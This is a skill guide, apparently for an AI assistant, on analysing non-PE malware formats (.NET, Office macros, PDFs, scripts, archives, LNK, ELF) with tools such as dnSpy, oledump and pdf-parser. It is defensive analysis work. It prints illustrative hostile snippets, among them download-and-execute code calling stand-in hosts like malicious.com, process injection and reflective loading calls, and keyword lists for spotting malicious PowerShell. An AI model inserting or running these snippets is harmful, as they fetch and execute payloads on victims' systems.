specialized-file-analyzer
npx machina-cli add skill gl0bal01/malware-analysis-claude-skills/specialized-file-analyzer --openclawSpecialized File Analyzer
Expert analysis of non-PE file formats commonly used in malware campaigns: .NET, Office documents, PDFs, scripts, archives, and Linux binaries.
When to Use This Skill
Use this skill when analyzing:
- .NET/C# assemblies (.exe, .dll with .NET framework)
- Office documents with macros (.docm, .xlsm, .doc, .xls)
- PDF files (suspicious attachments, exploit documents)
- Scripts (PowerShell .ps1, VBScript .vbs, JavaScript .js)
- Archives (.zip, .rar, .7z, .tar.gz)
- Shortcuts (.lnk files)
- Linux binaries (ELF executables)
- Batch files (.bat, .cmd)
Key indicator: file command shows non-PE32 executable or document type.
Quick File Type Identification
# Identify file type
file sample.bin
# Common outputs:
# "PE32+ console executable, for MS Windows" → Standard PE (use malware-triage)
# "PE32 executable (GUI) Intel 80386 Mono/.Net assembly" → .NET (use this skill)
# "Microsoft Office Document" → Office macro (use this skill)
# "PDF document, version 1.7" → PDF (use this skill)
# "Zip archive data" → Archive (use this skill)
# "ELF 64-bit LSB executable" → Linux binary (use this skill)
# "ASCII text, with CRLF line terminators" → Script (use this skill)
.NET / C# Assembly Analysis
Detection
# Check for .NET assembly
file sample.exe | grep "Mono/.Net assembly"
# Or check strings
strings sample.exe | grep "mscoree.dll"
# Check PE header
pe-parser sample.exe | grep "CLR Runtime"
Tool: dnSpy (Windows - Primary Tool)
Download: https://github.com/dnSpy/dnSpy
Workflow:
- Open sample.exe in dnSpy
- Navigate: Assembly Explorer → sample.exe → Namespace → Classes
- Find entry point: Right-click assembly → Go to Entry Point
What to Look For:
Main() Function:
// Entry point - start here
public static void Main(string[] args)
{
// Analyze execution flow
}
Suspicious Namespaces:
System.Net- Network operations (WebClient, HttpClient)System.Security.Cryptography- Encryption/decryptionSystem.Reflection- Dynamic code loadingSystem.Diagnostics.Process- Process executionSystem.IO- File operationsMicrosoft.Win32- Registry access
Common Malicious Patterns:
// Download and execute
WebClient wc = new WebClient();
wc.DownloadFile("http://malicious.com/payload.exe", "C:\\temp\\payload.exe");
Process.Start("C:\\temp\\payload.exe");
// Base64 decode embedded payload
byte[] decoded = Convert.FromBase64String(encodedPayload);
// Reflective loading
Assembly.Load(byte[] rawAssembly);
// Process injection
WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, out lpNumberOfBytesWritten);
Extract Embedded Resources:
Assembly Explorer → Right-click assembly → Resources
Look for:
- Embedded executables (byte arrays)
- Encrypted payloads
- Configuration data
- Icons (may hide data)
Right-click resource → Save
Deobfuscation:
# Using de4dot (automated deobfuscator)
de4dot sample.exe -o sample_deobfuscated.exe
# Handles common obfuscators:
# - ConfuserEx
# - .NET Reactor
# - Eazfuscator
# - Agile.NET
Dynamic Debugging:
dnSpy: Debug → Start Debugging (F5)
Set breakpoints on suspicious functions
Step through execution (F10/F11)
Watch variables and decrypted strings
Tool: ILSpy (Cross-platform Alternative)
# Command-line decompilation
ilspycmd sample.exe -o output_directory/
# GUI version (Windows/Linux/Mac)
ilspy sample.exe
Export decompiled code:
File → Save Code → C# Project
Analysis Checklist - .NET
- Entry point identified (Main function)
- Obfuscation detected and removed (if needed)
- Embedded resources extracted
- Network URLs/IPs extracted
- Crypto keys identified
- Anti-analysis checks found
- Payload execution method documented
- IOCs extracted (URLs, IPs, file paths)
Office Document / Macro Analysis
Detection
# Macro-enabled formats
# .docm, .xlsm, .pptm → Office 2007+ with macros
# .doc, .xls, .ppt → Legacy Office (97-2003) with macros
file document.docm
# Output: "Microsoft Word 2007+"
# Quick macro check
strings document.docm | grep -i "vba\|macro\|autoopen"
Tool: oledump.py (Primary - Didier Stevens)
Installation:
wget https://didierstevens.com/files/software/oledump_V0_0_70.zip
unzip oledump_V0_0_70.zip
Workflow:
1. List Streams:
python oledump.py document.docm
# Example output:
# 1: 114 '\x01CompObj'
# 2: 4096 '\x05DocumentSummaryInformation'
# 3: M 8192 'Macros/VBA/ThisDocument' ← Macro present (M indicator)
# 4: m 1024 'Macros/VBA/_VBA_PROJECT'
# 5: M 4096 'Macros/VBA/Module1'
2. Extract Macro Code:
# Extract macro from stream 3
python oledump.py -s 3 -v document.docm
# Decompress corrupted VBA
python oledump.py -s 3 --vbadecompresscorrupt document.docm
# Save to file
python oledump.py -s 3 -v document.docm > extracted_macro.vba
3. Analyze Macro Code:
Look for Auto-Execution Functions:
Sub AutoOpen() ' Word - runs on document open
Sub Document_Open() ' Word - runs on document open
Sub Workbook_Open() ' Excel - runs on workbook open
Sub Auto_Open() ' Excel - runs on workbook open
Look for Suspicious VBA Functions:
' Command execution
Shell("cmd.exe /c powershell ...")
CreateObject("WScript.Shell").Run "..."
' File download
CreateObject("MSXML2.XMLHTTP")
URLDownloadToFile ...
' File system operations
CreateObject("Scripting.FileSystemObject")
' Dynamic code execution
ExecuteStatement
Eval()
CallByName()
Tool: olevba (oletools Suite)
Installation:
pip install oletools
Automated Analysis:
# Comprehensive analysis
olevba document.docm
# Decode obfuscated strings
olevba --decode document.docm
# JSON output for parsing
olevba -j document.docm > analysis.json
# Extract IOCs only
olevba --decode document.docm | grep -E "http|https|powershell|cmd|wscript"
Output Interpretation:
- AutoExec - Auto-execution keywords found
- Suspicious - Suspicious VBA keywords
- IOCs - URLs, IPs, file paths
- Hex Strings - Encoded data
- Base64 Strings - Encoded payloads
- Dridex Strings - Dridex malware indicators
Excel 4.0 Macros (XLM Macros)
More evasive than VBA macros!
# Detect XLM macros
python oledump.py document.xls | grep XL
# Extract with XLMMacroDeobfuscator
git clone https://github.com/DissectMalware/XLMMacroDeobfuscator
python XLMMacroDeobfuscator.py -f document.xls
# Or use olevba
olevba document.xls --deobf
Modern Office Documents (.docx, .xlsx) - No Macros
Template Injection Attack:
# Extract Office Open XML structure
unzip document.docx -d extracted/
# Check for external template
cat extracted/word/_rels/document.xml.rels | grep "http"
# Look for:
# <Relationship Type="http://schemas.../attachedTemplate"
# Target="http://malicious.com/template.dotm" TargetMode="External"/>
Embedded Objects:
# Check for embedded files
ls extracted/word/embeddings/
# Analyze embedded objects
file extracted/word/embeddings/*
Analysis Checklist - Office Documents
- Macro presence confirmed
- All macro streams extracted
- Auto-execution functions identified
- Obfuscated strings decoded
- Download URLs extracted
- Payload execution method documented
- External template checked (.docx/.xlsx)
- Embedded objects analyzed
- IOCs extracted and defanged
PDF Analysis
Detection
file document.pdf
# Output: "PDF document, version 1.7"
Tool: pdfid.py (Didier Stevens)
Quick Triage:
python pdfid.py document.pdf
# Red flags:
# /OpenAction - Executes action on open
# /AA - Additional actions (auto-execute)
# /JavaScript - Embedded JavaScript
# /JS - JavaScript (short form)
# /Launch - Launch external program
# /EmbeddedFile - Embedded files
# /RichMedia - Flash/multimedia content
# /ObjStm - Object streams (can hide malicious content)
Example Output:
PDFiD 0.2.7 document.pdf
PDF Header: %PDF-1.7
obj 45
endobj 45
stream 12
endstream 12
/Page 5
/Encrypt 0
/ObjStm 0
/JS 3 ← Suspicious!
/JavaScript 2 ← Suspicious!
/AA 1 ← Auto-action present!
/OpenAction 1 ← Executes on open!
/Launch 0
/EmbeddedFile 0
/RichMedia 0
Tool: pdf-parser.py (Didier Stevens)
Extract JavaScript:
# Search for JavaScript objects
python pdf-parser.py --search javascript document.pdf
# Extract specific object
python pdf-parser.py --object 15 document.pdf
# Dump JavaScript code
python pdf-parser.py --object 15 --raw document.pdf > extracted_js.txt
# Filter streams
python pdf-parser.py --filter document.pdf
Tool: peepdf (Interactive Analysis)
# Install
pip install peepdf
# Interactive mode
peepdf -i document.pdf
# Commands in interactive shell:
> tree # Show object structure
> object 15 # Inspect object 15
> stream 15 # View stream 15
> javascript # Extract all JavaScript
> extract stream 15 > payload.bin
PDF Exploits
Common CVEs:
- CVE-2013-2729 - JavaScript heap spray
- CVE-2010-0188 - libtiff buffer overflow
- CVE-2009-0927 - JBIG2Decode heap overflow
Shellcode Detection:
# Look for shellcode in streams
python pdf-parser.py --raw --filter document.pdf | grep -E "(\x90{10}|\xeb)"
# Extract suspicious streams
python pdf-parser.py --object <id> --raw document.pdf | hexdump -C
Analysis Checklist - PDF
- pdfid scan completed (flags identified)
- JavaScript extracted (if present)
- Embedded files extracted
- Auto-action mechanism documented
- Shellcode indicators checked
- CVE exploitation checked (if relevant)
- URLs/IPs extracted from JS
- IOCs documented
PowerShell / Script Analysis
PowerShell (.ps1) Deobfuscation
Common Obfuscation Patterns:
Base64 Encoding:
# Encoded command execution
powershell.exe -EncodedCommand <base64_string>
# Decode manually
$encoded = "Base64StringHere"
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
String Concatenation:
$url = "ht" + "tp://" + "evil.com"
Compression:
$ms = New-Object IO.MemoryStream
$ms.Write([Convert]::FromBase64String($compressed), 0, $compressedLength)
$ms.Seek(0,0) | Out-Null
$cs = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
Tool: PSDecode
# Install
git clone https://github.com/R3MRUM/PSDecode
# Deobfuscate PowerShell
Import-Module .\PSDecode.ps1
PSDecode -InputFile malicious.ps1 -OutputFile decoded.txt
Manual Analysis:
# Read script without executing
Get-Content malicious.ps1
# Search for key indicators
Select-String -Path malicious.ps1 -Pattern "Invoke-Expression|IEX|DownloadString|DownloadFile|FromBase64String"
Suspicious PowerShell Patterns:
Invoke-Expression/IEX- Execute string as codeInvoke-WebRequest/Invoke-RestMethod- Download contentDownloadString/DownloadFile- Download payloadsFromBase64String- Decode embedded payloadIO.Compression.GzipStream- Decompress payloadReflection.Assembly]::Load- Load assembly from memory-EncodedCommand- Base64 encoded command-WindowStyle Hidden- Hide window-ExecutionPolicy Bypass- Bypass script execution policy
VBScript (.vbs) Analysis
' Common malicious patterns:
' Command execution
CreateObject("WScript.Shell").Run "cmd.exe /c ..."
' HTTP download
Set objHTTP = CreateObject("MSXML2.XMLHTTP")
objHTTP.Open "GET", "http://malicious.com/payload.exe", False
objHTTP.Send
' File operations
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFile = objFSO.CreateTextFile("C:\payload.exe", True)
' Dynamic execution
Eval(encodedCode)
Execute(decodedPayload)
Analysis:
# Read script
cat malicious.vbs
# Search for patterns
grep -i "CreateObject\|WScript.Shell\|MSXML2.XMLHTTP\|Eval\|Execute" malicious.vbs
# Deobfuscate: Replace Eval() with WScript.Echo() to print instead of execute
JavaScript (.js) Analysis
# Beautify obfuscated JS
cat malicious.js | js-beautify > beautified.js
# Online: https://beautifier.io/
Suspicious Patterns:
// Code execution
eval(encodedCode);
// Decode strings
unescape("%75%6E%65%73%63%61%70%65");
decodeURIComponent("%20");
// ActiveX (Windows COM objects)
var shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd.exe /c ...");
// WScript objects
var fso = new ActiveXObject("Scripting.FileSystemObject");
Analysis Checklist - Scripts
- Script type identified (PS1, VBS, JS, BAT)
- Obfuscation detected and removed
- Base64/encoded strings decoded
- Download URLs extracted
- Execution commands documented
- Dropped file paths identified
- IOCs extracted (URLs, IPs, domains)
Archive Analysis
Safe Inspection (No Extraction)
# List contents without extracting
7z l archive.zip
unzip -l archive.zip
tar -tzf archive.tar.gz
rar l archive.rar
# Look for red flags:
# - Double extensions (invoice.pdf.exe)
# - Executable files (.exe, .scr, .com, .bat, .vbs)
# - LNK files (shortcuts)
# - Deeply nested archives (archive.zip -> archive2.zip -> payload.exe)
Extract Safely
# Create isolated directory
mkdir /tmp/extracted_archive
cd /tmp/extracted_archive
# Extract
7z x ../archive.zip
unzip ../archive.zip
tar -xzf ../archive.tar.gz
# Immediately check file types
file *
Password-Protected Archives
Common passwords in malware:
infectedmalwarevirus2024/2025123456
# Extract with password
7z x -pinfected archive.zip
unzip -P infected archive.zip
LNK (Shortcut) File Analysis
Tool: LECmd (Windows)
# Download from: https://ericzimmerman.github.io/
LECmd.exe -f malicious.lnk
Tool: lnkinfo (Linux)
lnkinfo malicious.lnk
# Look for:
# - Target path (what it executes)
# - Command-line arguments
# - Working directory
# - Icon location (may reveal payload location)
Manual Strings Analysis:
strings malicious.lnk | grep -E "\.exe|\.dll|http|powershell|cmd"
Analysis Checklist - Archives
- Contents listed without extraction
- File extensions verified (no double extensions)
- Files extracted to isolated directory
- All extracted files typed (file command)
- LNK files analyzed (if present)
- Nested archives checked
- Password documented (if applicable)
Linux / ELF Binary Analysis
Detection
file sample.bin
# Output: "ELF 64-bit LSB executable, x86-64"
Static Analysis
ELF Header:
readelf -h sample.bin
# Shows:
# - Architecture (x86, x86-64, ARM)
# - Entry point address
# - Program header offset
# - Section header offset
Sections:
readelf -S sample.bin
# Look for suspicious sections:
# - High entropy sections (encrypted/packed)
# - Unusual section names
# - RWX sections (read-write-execute)
Imported Libraries:
ldd sample.bin
# Look for:
# - libssl.so (crypto/network)
# - libc.so (standard)
# - Unusual paths (/tmp/lib.so)
Imported Symbols:
nm -D sample.bin
objdump -T sample.bin
# Search for suspicious functions:
nm -D sample.bin | grep -E "socket|connect|fork|exec|ptrace|system"
Strings:
strings -a sample.bin | grep -E "http|/tmp|/etc|passwd"
Dynamic Analysis (Linux)
strace - System Call Monitoring:
# Monitor all system calls
strace -f ./sample.bin 2>&1 | tee strace_output.txt
# Monitor specific calls
strace -e trace=network,file,process ./sample.bin
# File operations only
strace -e trace=open,read,write,close ./sample.bin
# Network operations only
strace -e trace=socket,connect,send,recv ./sample.bin
ltrace - Library Call Monitoring:
ltrace -f ./sample.bin 2>&1 | tee ltrace_output.txt
Check for Packing:
# UPX detection
readelf -S sample.bin | grep UPX
# Unpack UPX
upx -d sample.bin -o sample_unpacked.bin
Analysis Checklist - ELF
- Architecture identified (x86/x64/ARM)
- Imported libraries documented
- Suspicious functions identified
- Packing detected and removed (if UPX)
- Strings extracted and analyzed
- System calls monitored (strace)
- Network activity captured
- File operations documented
Integration with Report Writing
Each file type contributes specific sections to the malware analysis report:
.NET Analysis →
- Decompiled code snippets
- Embedded resource descriptions
- Obfuscation techniques used
- Reflective loading mechanisms
Office Macros →
- Macro code (sanitized)
- Auto-execution methods
- Download URLs
- Payload dropping process
PDF Analysis →
- Embedded JavaScript
- Auto-action triggers
- Exploit CVEs (if applicable)
- Shellcode presence
Scripts →
- Deobfuscated code
- Execution flow
- Download cradles
- C2 communications
Archives/LNK →
- Archive structure
- Masquerading techniques
- LNK target analysis
- Social engineering aspects
ELF Binaries →
- System calls used
- Network protocols
- Persistence mechanisms (cron, systemd)
- Rootkit indicators
Tool Quick Reference
| File Type | Primary Tool | Secondary Tool |
|---|---|---|
| .NET | dnSpy | ILSpy, de4dot |
| Office Macros | oledump.py | olevba, XLMMacroDeobfuscator |
| pdfid.py, pdf-parser.py | peepdf | |
| PowerShell | PSDecode | Manual analysis |
| VBScript/JS | Text editor + analysis | js-beautify |
| Archives | 7z, unzip, tar | - |
| LNK | LECmd (Win), lnkinfo (Linux) | strings |
| ELF | readelf, nm, objdump | strace, ltrace |
Best Practices
Do:
- Always identify file type first (
filecommand) - Extract in isolated environments
- Document obfuscation techniques
- Save original and deobfuscated versions
- Test extracted IOCs for accuracy
- Cross-reference with VirusTotal/MalwareBazaar
Don't:
- Execute scripts without understanding them first
- Trust file extensions (check magic bytes)
- Skip deobfuscation steps
- Extract archives directly to important directories
- Assume password-protected = safe
Example Usage
User request: "I have a suspicious .docm file with macros, help me analyze it"
Workflow:
- Confirm file type (Office document)
- Use oledump.py to list streams
- Extract VBA macro code
- Identify auto-execution functions
- Decode obfuscated strings
- Extract download URLs and IOCs
- Document payload delivery method
- Prepare findings for report
Source
git clone https://github.com/gl0bal01/malware-analysis-claude-skills/blob/main/specialized-file-analyzer/SKILL.mdView on GitHub Overview
Specialized-file-analyzer provides expert analysis of non-PE formats used in malware campaigns, including .NET assemblies, Office macros, PDFs, scripts, archives, and Linux ELF binaries. It guides analysts when standard PE-focused tools miss format-specific artifacts, indicators, and payloads.
How This Skill Works
The skill identifies non-PE formats using system tools (file command) and then applies format-specific techniques (dnSpy/ILSpy for .NET, macro/script inspection, PDF analysis, archive exploration, and ELF examination). It highlights entry points, suspicious namespaces, embedded resources, and obfuscated payloads, and supports deobfuscation and dynamic debugging to uncover malicious behavior.
When to Use It
- .NET/C# assemblies (.exe, .dll)
- Office documents with macros (.docm, .xlsm, .doc, .xls)
- PDF files with potential exploits
- Scripts (PowerShell .ps1, VBScript .vbs, JavaScript .js)
- Linux ELF binaries
Quick Start
- Step 1: Identify the file type using file sample.bin
- Step 2: Open and inspect with the appropriate tool (dnSpy/ILSpy for .NET; macros/scripts/PDF tools for others)
- Step 3: Review entry points and patterns; extract resources, deobfuscate with de4dot, and perform targeted debugging
Best Practices
- Validate file type with the file command to confirm non-PE formats
- Use dnSpy or ILSpy to inspect .NET assemblies and locate the entry point
- Scan for suspicious namespaces and patterns (System.Net, Reflection, Process.Start, etc.)
- Inspect embedded resources and hidden payloads; extract when found
- Apply deobfuscation (de4dot) and perform targeted dynamic debugging in dnSpy
Example Use Cases
- A .NET assembly that downloads and executes a payload from the Internet
- A Word/Excel macro document that downloads a payload and writes to disk
- A PDF document crafted to exploit a vulnerability via crafted content
- PowerShell or JavaScript embedded in a document or script file with obfuscated strings
- An ELF binary hidden inside an archive with obfuscated strings and custom loader